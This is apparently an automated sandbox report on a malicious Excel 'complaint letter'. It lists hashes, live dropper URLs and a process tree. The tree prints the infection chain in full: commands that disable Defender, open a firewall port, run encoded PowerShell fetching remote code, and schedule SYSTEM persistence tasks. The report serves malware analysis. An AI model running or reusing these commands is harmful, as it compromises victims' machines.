Analysis

  • max time kernel
    142s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    11-03-2021 12:19

General

  • Target

    Complaint-Letter-2050692395-03102021.xls

  • Size

    281KB

  • MD5

    1defa9216b9455154b38c0775991e30f

  • SHA1

    b35e76b7ae9b2aaf253a44c6d3a8500b41458818

  • SHA256

    9c0656e6e8de2c3dc70989d4c563d3f250bc81bb1598cff78e0ec72aa854176a

  • SHA512

    d958e8f5dbc1dee799e08ed8ec331702d2ad289b241fd90b1f7df3b055122af230c611ab4078dbc7bf8bf6f92812a41b2e703a5321027ec84afc86cdf0168d07

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://t.amynx.com/gim.jsp

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://oracledispatch.com/pijxju/44266.5112703704.dat

xlm40.dropper

http://alvaelectrical.ir/jfvrrvwxrsv/44266.5112703704.dat

xlm40.dropper

http://www.bekagayrimenkul.com/xtgudsvqubbk/44266.5112703704.dat

xlm40.dropper

http://civil-group.ir/rvnhdtkyxgu/44266.5112703704.dat

xlm40.dropper

http://kumarpropack.com/jdvcnedwvpr/44266.5112703704.dat

Signatures

  • Process spawned unexpected child process 5 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Modifies Windows Firewall 1 TTPs
  • Drops file in System32 directory 27 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Modifies data under HKEY_USERS 34 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Complaint-Letter-2050692395-03102021.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:740
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32 ..\Runtime.brok,DllRegisterServer
      2⤵
      • Process spawned unexpected child process
      PID:1012
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32 ..\Runtime.brok1,DllRegisterServer
      2⤵
      • Process spawned unexpected child process
      PID:1552
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32 ..\Runtime.brok2,DllRegisterServer
      2⤵
      • Process spawned unexpected child process
      PID:324
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32 ..\Runtime.brok3,DllRegisterServer
      2⤵
      • Process spawned unexpected child process
      PID:304
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32 ..\Runtime.brok4,DllRegisterServer
      2⤵
      • Process spawned unexpected child process
      PID:1104
  • C:\Windows\qXRqMAeY.exe
    C:\Windows\qXRqMAeY.exe
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1564
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c call "c:\windows\temp\tmp.vbs"
      2⤵
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:1624
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
        3⤵
        • Modifies data under HKEY_USERS
        • Suspicious use of WriteProcessMemory
        PID:844
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c echo EYdGmA >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&powershell Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionPath c:\;Add-MpPreference -ExclusionProcess c:\windows\system32\WindowsPowerShell 1.0\powershell.exe&netsh firewall add portopening tcp 65529 DNSd&netsh interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53&copy /y c:\windows\temp\svchost.exe c:\windows\VxOXCu.exe&move /y c:\windows\temp\dig.exe c:\windows\KOCz.exe&if exist C:/windows/system32/WindowsPowerShell/ (powershell -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAHQALgBhAG0AeQBuAHgALgBjAG8AbQAvAGcAaQBtAC4AagBzAHAAJwApAA==&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn VxOXCu /tr "C:\Windows\VxOXCu.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\llrg" /tr "c:\windows\KOCz.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.zz3r0.com/page.html?pEIDQHRRL"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\KOCz.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\VxOXCu.exe"&schtasks /run /TN escan)
          4⤵
          • Drops file in Windows directory
          • Suspicious use of WriteProcessMemory
          PID:1500
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionPath c:\;Add-MpPreference -ExclusionProcess c:\windows\system32\WindowsPowerShell 1.0\powershell.exe
            5⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1488
          • C:\Windows\SysWOW64\netsh.exe
            netsh firewall add portopening tcp 65529 DNSd
            5⤵
            • Modifies data under HKEY_USERS
            PID:1056
          • C:\Windows\SysWOW64\netsh.exe
            netsh interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53
            5⤵
            • Modifies data under HKEY_USERS
            PID:736
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAHQALgBhAG0AeQBuAHgALgBjAG8AbQAvAGcAaQBtAC4AagBzAHAAJwApAA==
            5⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:988
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn VxOXCu /tr "C:\Windows\VxOXCu.exe" /F
            5⤵
            • Creates scheduled task(s)
            PID:1100
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\llrg" /tr "c:\windows\KOCz.exe" /F
            5⤵
            • Creates scheduled task(s)
            PID:864
  • C:\Windows\pzsTZoSj.exe
    C:\Windows\pzsTZoSj.exe
    1⤵
      PID:1948

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Modify Existing Service

    1
    T1031

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    System Information Discovery

    2
    T1082

    Query Registry

    1
    T1012

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_825b8c97-456d-45e0-ad20-3248b0be48ae
      MD5

      df44874327d79bd75e4264cb8dc01811

      SHA1

      1396b06debed65ea93c24998d244edebd3c0209d

      SHA256

      55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

      SHA512

      95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8647a6e5-2b55-45ff-924f-b062eec82618
      MD5

      be4d72095faf84233ac17b94744f7084

      SHA1

      cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

      SHA256

      b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

      SHA512

      43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a628c4bb-c847-4f43-b7b8-fc3df7e3ded8
      MD5

      5e3c7184a75d42dda1a83606a45001d8

      SHA1

      94ca15637721d88f30eb4b6220b805c5be0360ed

      SHA256

      8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

      SHA512

      fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a67207d5-5e53-419f-8e2a-a1effb0f69c8
      MD5

      b6d38f250ccc9003dd70efd3b778117f

      SHA1

      d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

      SHA256

      4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

      SHA512

      67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a79ac096-faf4-4576-a343-c83613fa4f7a
      MD5

      02ff38ac870de39782aeee04d7b48231

      SHA1

      0390d39fa216c9b0ecdb38238304e518fb2b5095

      SHA256

      fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

      SHA512

      24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dd108f00-0793-45c0-aeb9-b9f092133b4c
      MD5

      a725bb9fafcf91f3c6b7861a2bde6db2

      SHA1

      8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

      SHA256

      51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

      SHA512

      1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ee540e35-496f-4492-97b1-205ed8f45b20
      MD5

      75a8da7754349b38d64c87c938545b1b

      SHA1

      5c28c257d51f1c1587e29164cc03ea880c21b417

      SHA256

      bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

      SHA512

      798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f726eb44-6160-4183-a8a3-b73bba0bd401
      MD5

      597009ea0430a463753e0f5b1d1a249e

      SHA1

      4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

      SHA256

      3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

      SHA512

      5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
      MD5

      5ae191c4bb1610b73d39affefc94b0dc

      SHA1

      2ae48cb8ba6d6d7c12269c53385c66e85a134e36

      SHA256

      a82825f9ea099029c248b64d490eb326e955eeb1f84b0181b7ed8e682f98b5d0

      SHA512

      9a0c104daad520d3c7a343d2da03ac93d78f1b9c2caf0ba2927a04c22e5c258c1fb764c295751fe28c42df6c142460b13cdb36268567a89313f75be5d8a2e2d6

    • memory/304-12-0x0000000000000000-mapping.dmp
    • memory/324-10-0x0000000000000000-mapping.dmp
    • memory/736-65-0x0000000000000000-mapping.dmp
    • memory/740-2-0x000000002FE41000-0x000000002FE44000-memory.dmp
      Filesize

      12KB

    • memory/740-3-0x0000000071441000-0x0000000071443000-memory.dmp
      Filesize

      8KB

    • memory/740-4-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/844-18-0x0000000000000000-mapping.dmp
    • memory/864-87-0x0000000000000000-mapping.dmp
    • memory/988-73-0x0000000003280000-0x0000000003281000-memory.dmp
      Filesize

      4KB

    • memory/988-74-0x0000000003470000-0x0000000003471000-memory.dmp
      Filesize

      4KB

    • memory/988-67-0x0000000000000000-mapping.dmp
    • memory/988-85-0x0000000004B70000-0x0000000004B71000-memory.dmp
      Filesize

      4KB

    • memory/988-69-0x000000006B2A0000-0x000000006B98E000-memory.dmp
      Filesize

      6.9MB

    • memory/988-70-0x0000000000430000-0x0000000000431000-memory.dmp
      Filesize

      4KB

    • memory/988-75-0x0000000003472000-0x0000000003473000-memory.dmp
      Filesize

      4KB

    • memory/988-71-0x00000000034B0000-0x00000000034B1000-memory.dmp
      Filesize

      4KB

    • memory/988-72-0x0000000001060000-0x0000000001061000-memory.dmp
      Filesize

      4KB

    • memory/1012-7-0x0000000075E51000-0x0000000075E53000-memory.dmp
      Filesize

      8KB

    • memory/1012-6-0x0000000000000000-mapping.dmp
    • memory/1056-63-0x0000000000000000-mapping.dmp
    • memory/1100-86-0x0000000000000000-mapping.dmp
    • memory/1104-14-0x0000000000000000-mapping.dmp
    • memory/1420-5-0x000007FEF7590000-0x000007FEF780A000-memory.dmp
      Filesize

      2.5MB

    • memory/1488-21-0x0000000000000000-mapping.dmp
    • memory/1488-29-0x00000000013C0000-0x00000000013C1000-memory.dmp
      Filesize

      4KB

    • memory/1488-61-0x0000000004E40000-0x0000000004E41000-memory.dmp
      Filesize

      4KB

    • memory/1488-60-0x0000000004E30000-0x0000000004E31000-memory.dmp
      Filesize

      4KB

    • memory/1488-46-0x0000000004D60000-0x0000000004D61000-memory.dmp
      Filesize

      4KB

    • memory/1488-45-0x0000000004DB0000-0x0000000004DB1000-memory.dmp
      Filesize

      4KB

    • memory/1488-38-0x0000000004C10000-0x0000000004C11000-memory.dmp
      Filesize

      4KB

    • memory/1488-37-0x0000000004BB0000-0x0000000004BB1000-memory.dmp
      Filesize

      4KB

    • memory/1488-32-0x0000000004AF0000-0x0000000004AF1000-memory.dmp
      Filesize

      4KB

    • memory/1488-62-0x000000007EF30000-0x000000007EF31000-memory.dmp
      Filesize

      4KB

    • memory/1488-28-0x0000000001130000-0x0000000001131000-memory.dmp
      Filesize

      4KB

    • memory/1488-27-0x0000000001442000-0x0000000001443000-memory.dmp
      Filesize

      4KB

    • memory/1488-26-0x0000000001440000-0x0000000001441000-memory.dmp
      Filesize

      4KB

    • memory/1488-25-0x00000000034D0000-0x00000000034D1000-memory.dmp
      Filesize

      4KB

    • memory/1488-24-0x0000000000920000-0x0000000000921000-memory.dmp
      Filesize

      4KB

    • memory/1488-23-0x000000006B990000-0x000000006C07E000-memory.dmp
      Filesize

      6.9MB

    • memory/1500-20-0x0000000000000000-mapping.dmp
    • memory/1552-8-0x0000000000000000-mapping.dmp
    • memory/1624-16-0x0000000000000000-mapping.dmp